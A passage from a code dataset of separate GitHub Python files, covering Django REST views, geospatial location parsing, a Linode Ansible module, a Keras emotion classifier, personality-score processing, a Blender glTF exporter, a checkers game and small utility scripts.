post(self, request):\n# serializer = StreamPlatformSerializer(data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data, status=status.HTTP_201_CREATED)\n# else:\n# return Response(serializer.errors)\n\n\n\n# class StreamPlatformDetailAV(APIView):\n\n# def get(self, request, pk):\n \n# try:\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# except StreamPlatform.DoesNotExist:\n# content = {'error': 'Movie not found'}\n# return Response(content, status=status.HTTP_404_NOT_FOUND)\n \n# serializer = StreamPlatformSerializer(stream_platform)\n# return Response(serializer.data)\n\n \n# def put(self, request, pk):\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# serializer = StreamPlatformSerializer(stream_platform, data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data)\n# else:\n# return Response(serializer.errors)\n\n \n# def delete(self, request, pk):\n# stream_platform = StreamPlatform.objects.get(pk=pk)\n# stream_platform.delete()\n# content ={ 'response': 'deleted successfully' }\n# return Response(content, status=status.HTTP_204_NO_CONTENT)\n\n\n\n# For adding the data and fetching all the data\n# Function based views\n# @api_view(['GET', 'POST'])\n# def movie_list(request):\n# if request.method == 'GET':\n# movies = Movie.objects.all()\n# serializer = MovieSerializer(movies, many=True)\n# return Response(serializer.data)\n \n# elif request.method == 'POST':\n# serializer = MovieSerializer(data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data, status=status.HTTP_201_CREATED)\n# else:\n# return Response(serializer.errors)\n\n# # For retrieving the single data, update and delete \n\n# @api_view(['GET', 'PUT', 'DELETE'])\n# def movie_details(request, pk):\n\n# try:\n# movie = Movie.objects.get(pk=pk)\n# except Movie.DoesNotExist:\n# content = {'error': 'Movie not found'}\n# return Response(content, status=status.HTTP_404_NOT_FOUND)\n\n\n# if request.method == 'GET':\n# movie = Movie.objects.get(pk=pk)\n# serializer = MovieSerializer(movie)\n# return Response(serializer.data)\n\n# elif request.method == 'PUT':\n# movie = Movie.objects.get(pk=pk)\n# serializer = MovieSerializer(movie, data=request.data)\n# if serializer.is_valid():\n# serializer.save()\n# return Response(serializer.data)\n# else:\n# return Response(serializer.errors)\n \n# elif request.method == 'DELETE':\n# movie = Movie.objects.get(pk=pk)\n# movie.delete()\n# content ={ 'response': 'deleted successfully' }\n# return Response(content, status=status.HTTP_204_NO_CONTENT)\n","repo_name":"LokRaj-Vuppu/movie-database-api-drf","sub_path":"watchmate/watchlist_app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7751099134","text":"# %%\nimport json\nimport pandas as pd\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom shapely.geometry import Point, Polygon, LineString\nimport geodatasets\n\n# %matplotlib inline\n\n# %%\nf = open('Records.json')\ndata = json.load(f)\n\n# %%\nlocat = []\n\nfor i in data['locations']:\n locat.append(i)\n\nf.close()\n\n# %%\ndf = pd.DataFrame.from_dict(locat)\n\n\n# %%\nlist(df.columns)\n\n# %%\ndf['timestamp']\n\n# %%\ndf['timestamp'] = pd.to_datetime(df['timestamp'], format='ISO8601')\ndf['serverTimestamp'] = pd.to_datetime(df['serverTimestamp'], 
format='ISO8601')\ndf['deviceTimestamp'] = pd.to_datetime(df['deviceTimestamp'], format='ISO8601')\n\n# %%\nlatlong_factor = float(1e7)\n\ndf['longitude'] = df['longitudeE7'].astype('float64') / latlong_factor\ndf['latitude'] = df['latitudeE7'].astype('float64') / latlong_factor\n\ndf.to_csv('Records.csv')\n\ndf\n\n# %%\nsource = list(df['source'].unique())\ndeviceTag = list(df['deviceTag'].unique())\nplatformType = list(df['platformType'].unique())\nbatteryCharging = list(df['batteryCharging'].unique())\nformFactor = list(df['formFactor'].unique())\nheading = list(df['heading'].unique())\n\nprint(source)\nprint(deviceTag)\nprint(platformType)\nprint(batteryCharging)\nprint(formFactor)\nprint(heading)\n\n\n# %%\ndf[\"coordinates\"] = list(zip(df.longitude, df.latitude))\ndf[\"coordinates\"] = df[\"coordinates\"].apply(Point)\n\ndf\n\n# %%\ngdf = gpd.GeoDataFrame(df, geometry=\"coordinates\")\ngdf\n\n# %%\n# state_df = gpd.read_file(\"https://datascience.quantecon.org/assets/data/cb_2016_us_state_5m.zip\")\n# state_df.head()\n\n# %%\n# fig, gax = plt.subplots(figsize=(10, 10))\n# state_df.query(\"NAME == 'Wisconsin'\").plot(ax=gax, edgecolor=\"black\", color=\"white\")\n# plt.show()\n\n# %%\n# geodatasets.data\n\n# %%\n# print(geodatasets.get_url(\"naturalearth.land\"))\n# print(geodatasets.get_path(\"naturalearth.land\"))\n\n# naturalearth = gpd.read_file(geodatasets.get_path(\"naturalearth.land\"))\n# naturalearth\n\n# %%\n# gpd.datasets.available\n\n# %%\n# naturalearth.plot()\n# from mpl_toolkits.axes_grid1 import make_axes_locatable\n# fig, ax = plt.subplots(1, 1)\n# divider = make_axes_locatable(ax)\n# cax = divider.append_axes(\"bottom\", size=\"5%\", pad=0.1)\n\n# fig, ax = plt.subplots()\n# naturalearth.plot(ax=ax, color='white', edgecolor='black')\n\n# %%\n","repo_name":"tylermneher/google-locations","sub_path":"nb-as-script.py","file_name":"nb-as-script.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73719264487","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"This module contains all of the functionality for Linode Object Storage keys.\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom typing import Any, List, Optional, Union\n\nimport ansible_collections.linode.cloud.plugins.module_utils.doc_fragments.object_keys as docs\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_common import (\n LinodeModuleBase,\n)\nfrom ansible_collections.linode.cloud.plugins.module_utils.linode_docs import (\n global_authors,\n global_requirements,\n)\nfrom ansible_specdoc.objects import (\n FieldType,\n SpecDocMeta,\n SpecField,\n SpecReturnValue,\n)\nfrom linode_api4 import ObjectStorageKeys\n\nlinode_access_spec = {\n \"cluster\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\n \"The id of the cluster that the provided bucket exists under.\"\n ],\n ),\n \"bucket_name\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\n \"The name of the bucket to set the key's permissions for.\"\n ],\n ),\n \"permissions\": SpecField(\n type=FieldType.string,\n required=True,\n description=[\"The permissions to give the key.\"],\n choices=[\"read_only\", \"write_only\", \"read_write\"],\n ),\n}\n\nlinode_object_keys_spec = {\n \"label\": SpecField(\n type=FieldType.string,\n description=[\"The unique label to give this key.\"],\n ),\n \"access\": SpecField(\n type=FieldType.list,\n 
element_type=FieldType.dict,\n suboptions=linode_access_spec,\n description=[\"A list of access permissions to give the key.\"],\n ),\n \"state\": SpecField(\n type=FieldType.string,\n description=[\"The desired state of the target.\"],\n choices=[\"present\", \"absent\"],\n required=True,\n ),\n}\n\nSPECDOC_META = SpecDocMeta(\n description=[\"Manage Linode Object Storage Keys.\"],\n requirements=global_requirements,\n author=global_authors,\n options=linode_object_keys_spec,\n examples=docs.specdoc_examples,\n return_values={\n \"key\": SpecReturnValue(\n description=\"The Object Storage key in JSON serialized form.\",\n docs_url=\"https://www.linode.com/docs/api/object-storage/#object-storage\"\n \"-key-view__responses\",\n type=FieldType.dict,\n sample=docs.result_key_samples,\n )\n },\n)\n\n\nclass LinodeObjectStorageKeys(LinodeModuleBase):\n \"\"\"Module for creating and destroying Linode Object Storage Keys\"\"\"\n\n def __init__(self) -> None:\n self.module_arg_spec = SPECDOC_META.ansible_spec\n self.required_one_of = [\"state\", \"label\"]\n self.results = {\n \"changed\": False,\n \"actions\": [],\n \"key\": None,\n }\n\n self._key: Optional[ObjectStorageKeys] = None\n\n super().__init__(\n module_arg_spec=self.module_arg_spec,\n required_one_of=self.required_one_of,\n )\n\n def _get_key_by_label(self, label: str) -> Optional[ObjectStorageKeys]:\n try:\n # For some reason we can't filter on label here\n keys = self.client.object_storage.keys()\n\n key = None\n for current_key in keys:\n if current_key.label == label:\n key = current_key\n\n return key\n\n except IndexError:\n return None\n except Exception as exception:\n return self.fail(\n msg=\"failed to get object storage key {0}: {1}\".format(\n label, exception\n )\n )\n\n def _create_key(\n self, label: str, bucket_access: Union[dict, List[dict]]\n ) -> Optional[ObjectStorageKeys]:\n \"\"\"Creates an Object Storage key with the given label and access\"\"\"\n\n try:\n return self.client.object_storage.keys_create(\n label, bucket_access=bucket_access\n )\n except Exception as exception:\n return self.fail(\n msg=\"failed to create object storage key: {0}\".format(exception)\n )\n\n def _handle_key(self) -> None:\n \"\"\"Updates the key defined in kwargs\"\"\"\n\n params = self.module.params\n label: str = params.pop(\"label\")\n access: dict = params.get(\"access\")\n\n self._key = self._get_key_by_label(label)\n\n if self._key is None:\n self._key = self._create_key(label, bucket_access=access)\n self.register_action(\"Created key {0}\".format(label))\n\n self.results[\"key\"] = self._key._raw_json\n\n def _handle_key_absent(self) -> None:\n \"\"\"Deletes the key defined in kwargs\"\"\"\n\n label = self.module.params.pop(\"label\")\n\n self._key = self._get_key_by_label(label)\n\n if self._key is not None:\n self.results[\"key\"] = self._key._raw_json\n self._key.delete()\n self.register_action(\"Deleted key {0}\".format(label))\n\n def exec_module(self, **kwargs: Any) -> Optional[dict]:\n \"\"\"Constructs and calls the Linode Object Storage Key module\"\"\"\n\n state = kwargs.pop(\"state\")\n\n if state == \"absent\":\n self._handle_key_absent()\n return self.results\n\n self._handle_key()\n\n return self.results\n\n\ndef main() -> None:\n \"\"\"Constructs and calls the Linode Object Storage key module\"\"\"\n\n LinodeObjectStorageKeys()\n\n\nif __name__ == \"__main__\":\n 
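# standard entry point: Ansible modules are executed directly as scripts\n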
main()\n","repo_name":"linode/ansible_linode","sub_path":"plugins/modules/object_keys.py","file_name":"object_keys.py","file_ext":"py","file_size_in_byte":5505,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"53"} +{"seq_id":"43576634865","text":"import pandas as pd\r\nimport numpy as np\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom tensorflow.keras.layers import Dense, Input, Dropout, Flatten, Conv2D, BatchNormalization, Activation, MaxPooling2D\r\nfrom tensorflow.keras.models import Model, Sequential\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\r\nfrom tensorflow.keras.utils import plot_model\r\nfrom livelossplot import PlotLossesKeras\r\nfrom livelossplot.keras import PlotLossesCallback\r\nimport tensorflow as tf\r\n\r\n\r\ndef generate_np_arrays(df):\r\n original_arrays = df.image\r\n images = []\r\n for sample in original_arrays:\r\n image = np.array(sample.split(), dtype=\"float32\")\r\n image = image.reshape(48, 48)\r\n images.append(image)\r\n df[\"image\"] = images\r\n return df\r\n\r\n\r\ndef main():\r\n img_size = 48\r\n batch_size = 64 # todo: hyperparameter\r\n datagen_train = ImageDataGenerator(horizontal_flip=True) # todo: consider if necessary\r\n train_generator = datagen_train.flow_from_directory(\"train/\", target_size=(img_size, img_size),\r\n color_mode=\"grayscale\", batch_size=batch_size,\r\n class_mode='categorical', shuffle=True)\r\n\r\n val_generator = datagen_train.flow_from_directory(\"test/\", target_size=(img_size, img_size), color_mode=\"grayscale\",\r\n batch_size=batch_size, class_mode='categorical', shuffle=True)\r\n\r\n model = Sequential()\r\n # conv1\r\n model.add(Conv2D(64, (3, 3), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv2\r\n model.add(Conv2D(128, (5, 5), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv3\r\n model.add(Conv2D(512, (3, 3), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n # conv4\r\n model.add(Conv2D(512, (5, 5), padding='same', input_shape=(48, 48, 1)))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Flatten())\r\n\r\n model.add(Dense(256))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Dense(512))\r\n model.add(BatchNormalization())\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n\r\n model.add(Dense(7, activation='softmax'))\r\n opt = Adam(learning_rate=0.0005)\r\n model.compile(optimizer=opt, loss='categorical_crossentropy', metrics=['accuracy'])\r\n print(model.summary())\r\n\r\n \"\"\"\r\n Train and Evaluate\r\n \"\"\"\r\n epochs = 15\r\n steps_per_epoch = train_generator.n // train_generator.batch_size\r\n validation_steps = val_generator.n // val_generator.batch_size\r\n check_point = 
ModelCheckpoint(\"model_weights.h5\", monitor='val_accuracy', save_weights_only=True, mode='max',\r\n verbose=1)\r\n reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=2, min_lr=0.00001, mode='auto')\r\n call_backs = [PlotLossesCallback(), check_point, reduce_lr]\r\n history = model.fit(x=train_generator, steps_per_epoch=steps_per_epoch, epochs=epochs,\r\n validation_data=val_generator, validation_steps=validation_steps, callbacks=call_backs)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"noamraveh/AI_MNC_STAR","sub_path":"FacialExpressions/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8483623791","text":"from datetime import datetime\n\nfrom fastapi import FastAPI\nimport aiohttp\nimport asyncio\n\nHEADERS = {\"User-Agent\": \"zhang shang zhong you/6.1.1 (iPhone; iOS 14.6; Scale/3.00)\"}\nAPI_ROOT = \"https://be-prod.redrock.cqupt.edu.cn/magipoke-jwzx/\"\napp = FastAPI()\n\n\n@app.get(\"/query/{stu_id}\")\ndef root(stu_id: int):\n start = datetime.now()\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n tasks = [get_exam_info(stu_id), get_kebiao_info(stu_id)]\n results = loop.run_until_complete(asyncio.gather(*tasks))\n return {\"data\": results[1] - results[0], \"time\": datetime.now() - start}\n\n\n# 获取考试记录的课程\nasync def get_exam_info(stu_id: int):\n data = {\"stuNum\": stu_id}\n async with aiohttp.ClientSession() as session:\n async with session.post(API_ROOT + \"examSchedule\", data=data) as resp:\n resp_json = await resp.json()\n result = set()\n try:\n for exam in resp_json[\"data\"]:\n result.add(exam[\"course\"])\n finally:\n return result\n\n\n# 获取课表并返回一组set\nasync def get_kebiao_info(stu_id: int):\n data = {\"stu_num\": stu_id}\n async with aiohttp.ClientSession() as session:\n async with session.post(API_ROOT + \"kebiao\", data=data) as resp:\n resp_json = await resp.json()\n result = set()\n try:\n for exam in resp_json[\"data\"]:\n result.add(exam[\"course\"])\n finally:\n\n return result\n","repo_name":"sujoshua/Redrock_ci-cd_SREhomework","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7820183673","text":"import os,sys\nimport pandas as pd\nimport numpy as np\nfrom scipy import stats\n\ndef scoreTIPI(df):\n # slice out TIPI section\n dfTIPI = df[['E+','A-','C+','S-','O+','E-','A+','C-','S+','O-']]\n # code\n dfTIPI = dfTIPI.replace(['Disagree strongly','Disagree moderately',\n 'Disagree slightly','Neither agree nor disagree',\n 'Agree slightly','Agree moderately','Agree strongly'],\n [1,2,3,4,5,6,7])\n # reverse code\n dfTIPI[['A-','S-','E-','C-','O-']] = 8-dfTIPI[['A-','S-','E-','C-','O-']]\n # score\n TIPI_scored = pd.DataFrame()\n\n for trait in ['O','C','E','A','S']:\n TIPI_scored[trait] = (dfTIPI['%s+'%trait]+dfTIPI['%s-'%trait])/2\n\n return TIPI_scored\n\ndef normTIPI(df):\n # slice out TIPI section\n dfTIPI = df[['O','C','E','A','S']]\n\n filename = 'data/External/TIPInorms.csv'\n filepath = os.path.join(os.path.dirname(os.path.dirname(__file__)),filename)\n TIPInorms = pd.read_csv(filepath, index_col=0)\n arrTIPInorms = TIPInorms[['Openness','Conscientiousness','Extraversion',\n 'Agreeableness','Emotional Stability']].values\n arrTIPI = dfTIPI.values\n\n N_,D_ = np.shape(arrTIPI)\n for d in range(D_):\n x_tmp = arrTIPI[:,d]\n x_mu = 
arrTIPInorms[0][d]\n x_std = arrTIPInorms[1][d]\n arrTIPI[:,d] = (x_tmp - x_mu)/x_std\n\n return pd.DataFrame(arrTIPI, columns=['O','C','E','A','S'])\n\ndef codeGender(df):\n df['GenderCode']=0\n female = ['Female','F','f','female','FEMALE','Girl','Female ','female ','Woman','woman','femail','Femail',\n 'femal','Femal','Females']\n male = ['Male','male','M','m','Male ','MALE','Make', 'Man',' Male','male ']\n df['GenderCode'][df['Gender'].isin(female)] = 1\n df['GenderCode'][df['Gender'].isin(male)] = 2\n return df['GenderCode']\n\ndef stratTIPI(df,n_strat):\n if(n_strat==3):\n for trait in ['O','C','E','A','N']:\n df['%s_strat'%trait]=0\n df['%s_strat'%trait].loc[df[trait]<-1] = -1\n df['%s_strat'%trait].loc[df[trait]>1] = 1\n# df['%s_strat'%trait].loc[df['%s_strat'%trait]==0] = 2\n if(n_strat==2):\n for trait in ['O','C','E','A','N']:\n df['%s_bistrat'%trait]=0\n df['%s_bistrat'%trait].loc[df[trait]<0] = -1\n df['%s_bistrat'%trait].loc[df[trait]>0] = 1\n return df\n\n# not mine\ndef getCronbachAlpha(itemscores):\n itemscores = np.asarray(itemscores)\n itemvars = itemscores.var(axis=1, ddof=1)\n tscores = itemscores.sum(axis=0)\n nitems = len(itemscores)\n\n return nitems / (nitems-1.) * (1 - itemvars.sum() / tscores.var(ddof=1))\n","repo_name":"melissawessel/personality-stratification","sub_path":"analysis/CodingScoring.py","file_name":"CodingScoring.py","file_ext":"py","file_size_in_byte":2681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19682567298","text":"import mathutils\n\nfrom . import gltf2_blender_export_keys\nfrom io_scene_gltf2.blender.exp.gltf2_blender_gather_cache import cached\nfrom io_scene_gltf2.io.com import gltf2_io\nfrom io_scene_gltf2.blender.exp import gltf2_blender_gather_skins\nfrom io_scene_gltf2.io.exp.gltf2_io_user_extensions import export_user_extensions\nfrom ..com.gltf2_blender_extras import generate_extras\n\n@cached\ndef gather_joint(blender_object, blender_bone, export_settings):\n \"\"\"\n Generate a glTF2 node from a blender bone, as joints in glTF2 are simply nodes.\n\n :param blender_bone: a blender PoseBone\n :param export_settings: the settings for this export\n :return: a glTF2 node (acting as a joint)\n \"\"\"\n axis_basis_change = mathutils.Matrix.Identity(4)\n if export_settings[gltf2_blender_export_keys.YUP]:\n axis_basis_change = mathutils.Matrix(\n ((1.0, 0.0, 0.0, 0.0), (0.0, 0.0, 1.0, 0.0), (0.0, -1.0, 0.0, 0.0), (0.0, 0.0, 0.0, 1.0)))\n\n # extract bone transform\n if blender_bone.parent is None:\n correction_matrix_local = axis_basis_change @ blender_bone.bone.matrix_local\n else:\n correction_matrix_local = (\n blender_bone.parent.bone.matrix_local.inverted_safe() @\n blender_bone.bone.matrix_local\n )\n\n if (blender_bone.bone.use_inherit_rotation == False or blender_bone.bone.inherit_scale != \"FULL\") and blender_bone.parent != None:\n rest_mat = (blender_bone.parent.bone.matrix_local.inverted_safe() @ blender_bone.bone.matrix_local)\n matrix_basis = (rest_mat.inverted_safe() @ blender_bone.parent.matrix.inverted_safe() @ blender_bone.matrix)\n else:\n matrix_basis = blender_bone.matrix\n matrix_basis = blender_object.convert_space(pose_bone=blender_bone, matrix=matrix_basis, from_space='POSE', to_space='LOCAL')\n\n trans, rot, sca = (correction_matrix_local @ matrix_basis).decompose()\n translation, rotation, scale = (None, None, None)\n if trans[0] != 0.0 or trans[1] != 0.0 or trans[2] != 0.0:\n translation = [trans[0], trans[1], trans[2]]\n if rot[0] != 1.0 or rot[1] 
!= 0.0 or rot[2] != 0.0 or rot[3] != 0.0:\n rotation = [rot[1], rot[2], rot[3], rot[0]]\n if sca[0] != 1.0 or sca[1] != 1.0 or sca[2] != 1.0:\n scale = [sca[0], sca[1], sca[2]]\n\n # traverse into children\n children = []\n\n if export_settings[\"gltf_def_bones\"] is False:\n for bone in blender_bone.children:\n children.append(gather_joint(blender_object, bone, export_settings))\n else:\n _, children_, _ = gltf2_blender_gather_skins.get_bone_tree(None, blender_bone.id_data)\n if blender_bone.name in children_.keys():\n for bone in children_[blender_bone.name]:\n children.append(gather_joint(blender_object, blender_bone.id_data.pose.bones[bone], export_settings))\n\n # finally add to the joints array containing all the joints in the hierarchy\n node = gltf2_io.Node(\n camera=None,\n children=children,\n extensions=None,\n extras=__gather_extras(blender_bone, export_settings),\n matrix=None,\n mesh=None,\n name=blender_bone.name,\n rotation=rotation,\n scale=scale,\n skin=None,\n translation=translation,\n weights=None\n )\n\n export_user_extensions('gather_joint_hook', export_settings, node, blender_bone)\n\n return node\n\ndef __gather_extras(blender_bone, export_settings):\n if export_settings['gltf_extras']:\n return generate_extras(blender_bone.bone)\n return None\n","repo_name":"MeltyPlayer/FinModelUtility","sub_path":"FinModelUtility/ModelPluginWrappers/blender/io_scene_gltf2/blender/exp/gltf2_blender_gather_joints.py","file_name":"gltf2_blender_gather_joints.py","file_ext":"py","file_size_in_byte":3544,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"53"} +{"seq_id":"12969548487","text":"from clsLocation import Location\nclass Checkers:\n\n def __init__(self, location, opLocationList = [], jumps = 0):\n self.location = location\n self.opLocationList = opLocationList\n self.king = True if self.location.row == 8 else False\n self.jumps = jumps\n\n def jumpOne(self, opLocation):\n if self.canJump(opLocation):\n self.location = self.attempt(opLocation)\n self.capture(opLocation)\n\n def jump(self):\n adjacentLocations = self.adjacentOpponents()\n if len(adjacentLocations) == 0:\n return\n else:\n opLocation = adjacentLocations[0]\n while self.canJump(opLocation):\n self.jumpOne(opLocation)\n self.jumps += 1\n if self.location.row == 8:\n self.king = True\n adjacentLocations = self.adjacentOpponents()\n if len(adjacentLocations) == 0:\n break\n else:\n opLocation = adjacentLocations[0]\n\n def isOccupied(self, location):\n for loc in self.opLocationList:\n if (loc.row == location.row) and (loc.column == location.column):\n return True\n return False\n\n def canJump(self, opLocation):\n canJump = self.location.row < 8 and self.location.row > 0\n canJump &= isinstance(opLocation, Location)\n canJump &= self.isAdjacent(opLocation)\n canJump &= (opLocation.row != 1 and opLocation.row != 8)\n canJump &= (opLocation.column != 1 and opLocation.column != 8)\n canJump &= not self.isOccupied(self.attempt(opLocation))\n return canJump\n\n def addOpponentLocation(self, opLocation):\n self.opLocationList.append(opLocation)\n\n def isAdjacent(self, opLocation):\n if self.king:\n adjacent = (opLocation.row == self.location.row - 1)\n adjacent &= (opLocation.column == self.location.column + 1 or opLocation.column == self.location.column - 1)\n else:\n adjacent = (opLocation.row == self.location.row + 1)\n adjacent &= (opLocation.column == self.location.column + 1 or opLocation.column == self.location.column - 1)\n return adjacent\n\n def attempt(self, 
opLocation):\n newLocation = Location()\n if self.king:\n if opLocation.row < self.location.row:\n newLocation.row = opLocation.row - 1\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n elif opLocation.row > self.location.row:\n newLocation.row = opLocation.row + 1\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n else:\n if opLocation.column < self.location.column:\n newLocation.column = opLocation.column - 1\n newLocation.row = opLocation.row + 1\n elif opLocation.column > self.location.column:\n newLocation.column = opLocation.column + 1\n newLocation.row = opLocation.row + 1\n return newLocation\n\n def adjacentOpponents(self):\n adjacentLocations = []\n for loc in self.opLocationList:\n if self.isAdjacent(loc) and self.canJump(loc):\n adjacentLocations.append(loc)\n return adjacentLocations\n\n def capture(self, opLocation):\n self.opLocationList.remove(opLocation)\n\n\n\n\n","repo_name":"matthewru/PythonLearning","sub_path":"ACSL/SampleProblems/Contest_2/clsCheckers.py","file_name":"clsCheckers.py","file_ext":"py","file_size_in_byte":3714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18975325945","text":"from typing import NamedTuple, List\nfrom urllib.request import urlopen\nfrom xmltodict import parse\nfrom typedconfig.source import IniFileConfigSource\nfrom pathlib import Path\nfrom tools.configuration import parse_config\nfrom tools.db import connectToDB, get_entry_id_or_create_it, update_entry\nfrom tools.configuration import DatabaseConfig\nimport pandas as pd\n\n\nCONFIG_FILE_PATH = Path(\"import_scripts/defaultConfig.cfg\")\n\nTSA_CONFIG = Path(\"import_scripts/tsa_connection.cfg\")\ntsaConfig = DatabaseConfig()\ntsaConfig.add_source(IniFileConfigSource(TSA_CONFIG))\n\nconfig = parse_config(CONFIG_FILE_PATH)\n\n\n# get species list with codes from majo from train_europe table\nSELECT_DISTINCT_SPECIES = \"\"\"\nSELECT DISTINCT ClassName, ClassId FROM train_europe_v02 \nORDER BY ClassName ASC;\n\"\"\"\n\nspecies_train_collection = []\nwith connectToDB(tsaConfig) as db_tsa_connection:\n with db_tsa_connection.cursor() as db_tsa_cursor:\n db_tsa_cursor.execute(SELECT_DISTINCT_SPECIES)\n species_train_collection = db_tsa_cursor.fetchall()\n\nnot_matched = []\nwith connectToDB(config.database) as db_connection:\n with db_connection.cursor() as db_cursor:\n for row in species_train_collection:\n result = update_entry(\n db_cursor,\n \"species\",\n [(\"mario_id\", row[1])],\n [(\"latin_name\", row[0])],\n )\n if db_cursor.rowcount == 0:\n not_matched.append(row)\n db_connection.commit()\n\nfor i in not_matched:\n print(i[0])\nprint(\"not_matched: {}\".format(len(not_matched)))\n\n\n(\n \"AVPDPEAT\",\n \"AVPIDEMA\",\n \"AVPDLOCR\",\n \"AVPDPOPA\",\n \"AVPDCYCA\",\n \"AVPDPAMA\",\n \"AVPCPHSI\",\n \"AVPCPHTR\",\n \"AVSYSYAT\",\n \"AVTGTRTR\",\n \"AVSISIEU\",\n \"AVTUTUME\",\n \"AVTUTUPH\",\n \"AVTUTUVI\",\n \"AVMUMUST\",\n \"AVMUERRU\",\n \"AVMUFIHY\",\n \"AVMUPHPH\",\n \"AVMTANTR\",\n \"AVFRFRCO\",\n \"AVFRCOCO\",\n \"AVFRCHCH\",\n
\"AVFRSPSP\",\n)\n","repo_name":"hdogan84/database","sub_path":"src/import_scripts/import_database_tsa.py","file_name":"import_database_tsa.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38931255038","text":"import pickle\nimport os\n\ntry:\n file_object = open(\"games.pydata\", \"rb\")\n games = pickle.load(file_object)\n file_object.close()\nexcept:\n games = []\n\nif len(games) > 0:\n for game in games:\n print(\"The following games were loaded from the file: %s\" % game)\nelse:\n print(\"There was no list games to load.\")\n\nnew_game = \"\"\nwhile new_game != \"quit\":\n new_game = input(\"Enter a game you enjoy playing, or type 'quit' to exit: \")\n if new_game != \"quit\":\n games.append(new_game)\n\ntry:\n file_object = open(\"games.pydata\", \"wb\")\n pickle.dump(games, file_object)\n file_object.close()\n\n print(\"I will remember the following games: \")\n for game in games:\n print(game)\nexcept Exception as e:\n print(e)\n print(\"I couldn't figure out how to store the games, sorry.\")\nos.system(\"pause\")\n","repo_name":"EmissaryEntertainment/3D-Scripting","sub_path":"Week_6/McSpadden_Exercise_6.2.py","file_name":"McSpadden_Exercise_6.2.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19949353315","text":"import os\nimport sys\nfrom pathlib import Path\n\ncur_path = sys.path[0]\n\nos.system(\"pip3 install -U pip wheel setuptools\")\nos.system(\"pip3 install -r requirements.txt\")\nos.system(\"sudo apt-get install libxcb-xinerama0\")\nos.system(\"cp {}/icons/logo.png ~/.local/share/icons/warp_gui.png\".format(cur_path))\n\ndesktop_file = '{}/.local/share/applications/WARP-Linux.desktop'.format(Path.home())\n\nfile = open(desktop_file, 'w+')\nfile.write('''[Desktop Entry]\nName=WARP-Linux \nVersion=1.0\nComment=use warp-cli in GUI\nExec=python3 {}/main.py\nIcon=warp_gui\nTerminal=false\nType=Application\n'''.format(cur_path))\nprint('Desktop file created at \"{}\"'.format(desktop_file))\n","repo_name":"0xb4dc0d3x/WarpLinuxConnector","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39013628111","text":"'''\ncreate netcdf input for inversion.\ntemplate ascii inputs provided by Kasra :\n- ffproc.receivers\n- ffproc.ampstt.bandi\n- kernel_filter.txt\n- ffproc.source\n\nothers\n\nstructure : \n\n- filters\n\n- events :\n - stations :\n - real\n - synthetics :\n - iterations :\n - measurements : \n - filter\n - windows\n - 